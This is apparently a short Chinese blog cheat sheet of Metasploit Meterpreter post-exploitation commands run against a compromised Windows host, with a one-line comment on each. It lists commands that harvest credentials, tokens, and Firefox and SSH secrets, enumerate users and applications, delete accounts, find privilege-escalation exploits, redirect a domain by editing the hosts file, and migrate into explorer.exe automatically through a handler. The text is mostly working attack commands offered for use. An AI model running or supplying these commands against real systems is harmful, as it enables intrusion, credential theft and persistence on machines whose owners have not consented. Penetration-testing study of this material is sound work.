详情:https://www.jianshu.com/p/3623b878daf9
https://blog.csdn.net/f_carey/article/details/120101365
POST 模块
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 #arp扫描meterpreter > run post/windows/gather/checkvm #确认是否虚拟机meterpreter > run post/windows/gather/credentials/credential_collector #账号与tokenmeterpreter > run post/windows/gather/enum_applications #应用程序详情,会保存到一个文本里meterpreter > run post/windows/gather/enum_logged_on_users #当前登录的用户meterpreter > run post/windows/gather/enum_snmp #snmpmeterpreter > run post/windows/manage/delete_user USERNAME=test #删除用户,重启生效meterpreter > run post/multi/recon/local_exploit_suggester #所有可以提权的漏洞meterpreter > run post/multi/gather/env #大量信息meterpreter > run post/multi/gather/firefox_creds #通过firefox进行控制meterpreter > run post/multi/gather/ssh_creds #本地ssh信息meterpreter > run post/multi/gather/check_malware REMOTEFILE=c:\a.exe #检查文件是不是恶意软件meterpreter > run hostsedit -e 1.1.1.1,www.baidu.com #修改host,将baidu解析到1.1.1.1msf > use exploit/multi/handlermsf exploit(handler) > set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com #自动执行 metepreter 脚本meterpreter > migrate -N explorer.exemsf exploit(handler) > set InitialAutoRunScript migrate -n explorer.exe #自动执行 post 模块原文:https://fishpond.blog.csdn.net/article/details/105860273
若有收获,就点个赞吧
0 人点赞
